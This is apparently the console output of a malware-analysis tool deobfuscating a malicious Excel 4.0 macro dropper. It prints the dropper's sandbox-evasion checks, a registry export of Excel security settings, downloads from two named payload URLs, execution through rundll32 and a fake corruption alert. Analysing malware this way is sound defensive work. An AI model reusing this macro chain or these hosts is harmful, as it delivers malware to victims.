example - deobfuscated

1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\d42c62adb7559c60809dfa51d53e64b6a0a400408afbf3aef8fd7bde2367ef1c
2.  
3. _ _______
4. |\ /|( \ ( )
5. ( \ / )| ( | () () |
6. \ (_) / | | | || || |
7. ) _ ( | | | |(_)| |
8. / ( ) \ | | | | | |
9. ( / \ )| (____/\| ) ( |
10. |/ \|(_______/|/ \|
11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
19.  
20.  
21. XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
22.  
23. File: C:\Users\user\Downloads\d42c62adb7559c60809dfa51d53e64b6a0a400408afbf3aef8fd7bde2367ef1c
24.  
25. [Loading Cells]
26. auto_open: auto_openxp6og->tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!$CS$23836
27. [Starting Deobfuscation]
28. CELL:CS23836 , FullEvaluation , FORMULA(26,FW19305)
29. CELL:CS23837 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AI46959)
30. CELL:AI46959 , FullEvaluation , FORMULA(-368,ED10392)
31. CELL:AI46960 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IM26282)
32. CELL:IM26282 , FullEvaluation , FORMULA(-301,EG8350)
33. CELL:IM26283 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HD24619)
34. CELL:HD24619 , FullEvaluation , FORMULA(648,FU10914)
35. CELL:HD24620 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DV49385)
36. CELL:DV49385 , FullEvaluation , FORMULA(638.4,W48406)
37. CELL:DV49386 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IJ54262)
38. CELL:IJ54262 , FullEvaluation , FORMULA(47,AD21470)
39. CELL:IJ54263 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AQ28036)
40. CELL:AQ28036 , FullEvaluation , FORMULA(-436,BQ37930)
41. CELL:AQ28037 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AU15874)
42. CELL:AU15874 , FullEvaluation , FORMULA(-117,BL21938)
43. CELL:AU15875 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BM56647)
44. CELL:BM56647 , FullEvaluation , FORMULA(-190,IS58563)
45. CELL:BM56648 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GH13183)
46. CELL:GH13183 , FullEvaluation , FORMULA(216,FH48629)
47. CELL:GH13184 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EN65022)
48. CELL:EN65022 , FullEvaluation , FORMULA(-88,BO51056)
49. CELL:EN65023 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HI20419)
50. CELL:HI20419 , FullEvaluation , FORMULA(-268,AM7352)
51. CELL:HI20420 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IT33849)
52. CELL:IT33849 , FullEvaluation , FORMULA(-28,IK31173)
53. CELL:IT33850 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HX33694)
54. CELL:HX33694 , FullEvaluation , FORMULA(336,FD63424)
55. CELL:HX33695 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IE30187)
56. CELL:IE30187 , FullEvaluation , FORMULA(467,CI151)
57. CELL:IE30188 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!P25229)
58. CELL:P25229 , FullEvaluation , FORMULA(-255,B22727)
59. CELL:P25230 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BI16974)
60. CELL:BI16974 , FullEvaluation , FORMULA(306.25,DE61562)
61. CELL:BI16975 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BV36285)
62. CELL:BV36285 , FullEvaluation , FORMULA(-134,CO58518)
63. CELL:BV36286 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER25619)
64. CELL:ER25619 , FullEvaluation , FORMULA(-425,GR31095)
65. CELL:ER25620 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER915)
66. CELL:ER915 , FullEvaluation , FORMULA(-1487.5,GT50980)
67. CELL:ER916 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DP31417)
68. CELL:DP31417 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",BS5069)
69. CELL:DP31418 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ES64418)
70. CELL:ES64418 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",FU20485)
71. CELL:ES64419 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FR29556)
72. CELL:FR29556 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",CI55856)
73. CELL:FR29557 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BX28478)
74. CELL:BX28478 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",Y2223)
75. CELL:BX28479 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GX30254)
76. CELL:GX30254 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)",EM52673)
77. CELL:GX30255 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IT24175)
78. CELL:IT24175 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)",AB46814)
79. CELL:IT24176 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HF59100)
80. CELL:HF59100 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,CLOSE(TRUE))",GP56392)
81. CELL:HF59101 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DS12421)
82. CELL:DS12421 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,CLOSE(TRUE))",AR61812)
83. CELL:DS12422 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IR45905)
84. CELL:IR45905 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,CLOSE(TRUE))",AV30811)
85. CELL:IR45906 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GM39944)
86. CELL:GM39944 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",DB2735)
87. CELL:GM39945 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FQ5201)
88. CELL:FQ5201 , FullEvaluation , FORMULA("=""C:\Users\Public\ziZqqH.reg""",DX8859)
89. CELL:FQ5202 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BI51976)
90. CELL:BI51976 , FullEvaluation , FORMULA("=R[2345]C[97]&GET.WORKSPACE(2)&""\Excel\Security ""&R[8469]C[119]&"" /y""",I390)
91. CELL:BI51977 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!K17837)
92. CELL:K17837 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",FR11386)
93. CELL:K17838 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!J48104)
94. CELL:J48104 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-11476]C[52],R[-22472]C[-113],0,5)",DR22862)
95. CELL:J48105 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EZ12513)
96. CELL:EZ12513 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-18644]C[104])))",X27503)
97. CELL:EZ12514 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EW11228)
98. CELL:EW11228 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",X27504)
99. CELL:EW11229 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FY9357)
100. CELL:FY9357 , FullEvaluation , FORMULA("=NEXT()",X27505)
101. CELL:FY9358 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CP4135)
102. CELL:CP4135 , FullEvaluation , FORMULA("=""http://theislandmen.com/wp-smart.php""",HX58157)
103. CELL:CP4136 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AT21116)
104. CELL:AT21116 , FullEvaluation , FORMULA("=""http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php""",BM58324)
105. CELL:AT21117 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CN34881)
106. CELL:CN34881 , FullEvaluation , FORMULA("=FOPEN(R[-46897]C[-36])",FH55756)
107. CELL:CN34882 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HG32718)
108. CELL:HG32718 , FullEvaluation , FORMULA("=FPOS(R[35378]C[48],215)",DL20378)
109. CELL:HG32719 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HJ24458)
110. CELL:HJ24458 , FullEvaluation , FORMULA("=FREAD(R[27967]C[-61],255)",HQ27789)
111. CELL:HJ24459 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HI43987)
112. CELL:HI43987 , FullEvaluation , FORMULA("=FCLOSE(R[5666]C[89])",BW50090)
113. CELL:HI43988 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!T25103)
114. CELL:T25103 , FullEvaluation , FORMULA("=FILE.DELETE(R[-41985]C[-81])",HA50844)
115. CELL:T25104 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FE48429)
116. CELL:FE48429 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-6267]C[186])),CLOSE(FALSE),)",AM34056)
117. CELL:FE48430 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BB19811)
118. CELL:BB19811 , FullEvaluation , FORMULA("=""C:\Users\Public\NqSfY7Fd.html""",AR22886)
119. CELL:BB19812 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!N57229)
120. CELL:N57229 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[50489]C[35],R[17519]C[-8],0,0)",AZ5367)
121. CELL:N57230 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GL59066)
122. CELL:GL59066 , FullEvaluation , FORMULA("=FILES(R[-11938]C[-94])",EH34824)
123. CELL:GL59067 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FJ46055)
124. CELL:FJ46055 , FullEvaluation , FORMULA("=IF(ISERROR(R[-27988]C[91]),CLOSE(FALSE),)",AU62812)
125. CELL:FJ46056 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!IS17943)
126. CELL:IS17943 , FullEvaluation , FORMULA("=""C:\Users\Public\gGCUNF.html""",F60085)
127. CELL:IS17944 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FL45824)
128. CELL:FL45824 , FullEvaluation , FORMULA("=R[24675]C[-102]&"",DllRegisterServer""",DD35410)
129. CELL:FL45825 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AS4957)
130. CELL:AS4957 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[9307]C[66],R[11235]C[-160],0,0)",FJ48850)
131. CELL:AS4958 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EL13627)
132. CELL:EL13627 , FullEvaluation , FORMULA("=FILES(R[-1444]C[-97])",CY61529)
133. CELL:EL13628 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AX22261)
134. CELL:AX22261 , FullEvaluation , FORMULA("=IF(ISERROR(R[45285]C[82]),,RUN(R[-12028]C[59]))",U16244)
135. CELL:AX22262 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EI25186)
136. CELL:EI25186 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[30088]C[-70],R[31849]C[-129],0,0)",EE28236)
137. CELL:EI25187 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FS37429)
138. CELL:FS37429 , FullEvaluation , FORMULA("=ALERT(R[853]C[-9],2)",CB4216)
139. CELL:FS37430 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DJ33074)
140. CELL:DJ33074 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-40976]C[-14],R[-26051]C[-83],0,5)",GI61461)
141. CELL:DJ33075 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!R26591)
142. CELL:R26591 , FullEvaluation , FORMULA("=CLOSE(FALSE)",ER20868)
143. CELL:R26592 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BS5069)
144. CELL:BS5069 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
145. CELL:BS5070 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FU20485)
146. CELL:FU20485 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
147. CELL:FU20486 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CI55856)
148. CELL:CI55856 , FullEvaluation , "https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates"
149. CELL:CI55857 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!Y2223)
150. CELL:Y2223 , PartialEvaluation , APP.MAXIMIZE()
151. CELL:Y2224 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EM52673)
152. CELL:EM52673 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
153. CELL:EM52674 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AB46814)
154. CELL:AB46814 , FullEvaluation , IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
155. CELL:AB46815 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GP56392)
156. CELL:GP56392 , FullEvaluation , IF(GET.WORKSPACE(19),,CLOSE(TRUE))
157. CELL:GP56393 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AR61812)
158. CELL:AR61812 , FullEvaluation , IF(GET.WORKSPACE(42),,CLOSE(TRUE))
159. CELL:AR61813 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AV30811)
160. CELL:AV30811 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
161. CELL:AV30811 , FullEvaluation , [TRUE]
162. CELL:AV30812 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DB2735)
163. CELL:DB2735 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\"
164. CELL:DB2736 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DX8859)
165. CELL:DX8859 , FullEvaluation , "C:\Users\Public\ziZqqH.reg"
166. CELL:DX8860 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!I390)
167. CELL:I390 , FullEvaluation , "EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\ziZqqH.reg /y"
168. CELL:I391 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FR11386)
169. CELL:FR11386 , FullEvaluation , "C:\Windows\system32\reg.exe"
170. CELL:FR11387 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DR22862)
171. CELL:DR22862 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security C:\Users\Public\ziZqqH.reg /y",0,5)
172. CELL:DR22863 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!X27503)
173. CELL:X27503 , PartialEvaluation , WHILE(ISERROR(FILES(R[-18644]C[104])))
174. CELL:X27506 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HX58157)
175. CELL:HX58157 , FullEvaluation , "http://theislandmen.com/wp-smart.php"
176. CELL:HX58158 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BM58324)
177. CELL:BM58324 , FullEvaluation , "http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php"
178. CELL:BM58325 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FH55756)
179. CELL:FH55756 , PartialEvaluation , FOPEN("C:\Users\Public\ziZqqH.reg")
180. CELL:FH55757 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DL20378)
181. CELL:DL20378 , PartialEvaluation , FPOS("FOPEN(""C:\Users\Public\ziZqqH.reg"")",215)
182. CELL:DL20379 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HQ27789)
183. CELL:HQ27789 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\ziZqqH.reg"")",255)
184. CELL:HQ27790 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!BW50090)
185. CELL:BW50090 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\ziZqqH.reg"")")
186. CELL:BW50091 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!HA50844)
187. CELL:HA50844 , PartialEvaluation , FILE.DELETE("C:\Users\Public\ziZqqH.reg")
188. CELL:HA50845 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AM34056)
189. CELL:AM34056 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[-6267]C[186])),CLOSE(FALSE),)
190. CELL:AM34056 , End , [TRUE] CLOSE(FALSE)
191. CELL:AM34056 , FullEvaluation , [FALSE]
192. CELL:AM34057 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AR22886)
193. CELL:AR22886 , FullEvaluation , "C:\Users\Public\NqSfY7Fd.html"
194. CELL:AR22887 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AZ5367)
195. CELL:AZ5367 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\NqSfY7Fd.html",0,0)
196. CELL:AZ5368 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EH34824)
197. CELL:EH34824 , PartialEvaluation , FILES("C:\Users\Public\NqSfY7Fd.html")
198. CELL:EH34825 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!AU62812)
199. CELL:AU62812 , FullBranching , IF(ISERROR(R[-27988]C[91]),CLOSE(FALSE),)
200. CELL:AU62812 , End , [TRUE] CLOSE(FALSE)
201. CELL:AU62812 , FullEvaluation , [FALSE]
202. CELL:AU62813 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!F60085)
203. CELL:F60085 , FullEvaluation , "C:\Users\Public\gGCUNF.html"
204. CELL:F60086 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!DD35410)
205. CELL:DD35410 , FullEvaluation , "C:\Users\Public\gGCUNF.html,DllRegisterServer"
206. CELL:DD35411 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!FJ48850)
207. CELL:FJ48850 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://theislandmen.com/wp-smart.php","C:\Users\Public\gGCUNF.html",0,0)
208. CELL:FJ48851 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CY61529)
209. CELL:CY61529 , PartialEvaluation , FILES("C:\Users\Public\gGCUNF.html")
210. CELL:CY61530 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!U16244)
211. CELL:U16244 , FullBranching , IF(ISERROR(R[45285]C[82]),,RUN(R[-12028]C[59]))
212. CELL:U16244 , FullEvaluation , [TRUE]
213. CELL:U16245 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!EE28236)
214. CELL:EE28236 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://shetkarimarket.com/wp-snapshots/tmp/wp-smart.php","C:\Users\Public\gGCUNF.html",0,0)
215. CELL:EE28237 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CB4216)
216. CELL:CB4216 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
217. CELL:CB4217 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GI61461)
218. CELL:GI61461 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\gGCUNF.html,DllRegisterServer",0,5)
219. CELL:GI61462 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER20868)
220. CELL:ER20868 , End , CLOSE(FALSE)
221. CELL:U16244 , FullEvaluation , [FALSE] RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!CB4216)
222. CELL:CB4216 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
223. CELL:CB4217 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!GI61461)
224. CELL:GI61461 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\gGCUNF.html,DllRegisterServer",0,5)
225. CELL:GI61462 , FullEvaluation , RUN(tZeD8Cgz5NjRpsyO4Malz1YoFuPlT2!ER20868)
226. CELL:ER20868 , End , CLOSE(FALSE)
227. CELL:AV30811 , End , [FALSE] CLOSE(TRUE)
228. [Day of Month] 4
229. [END of Deobfuscation]
230. time elapsed: 2.736368179321289
231.  
232. Process finished with exit code 0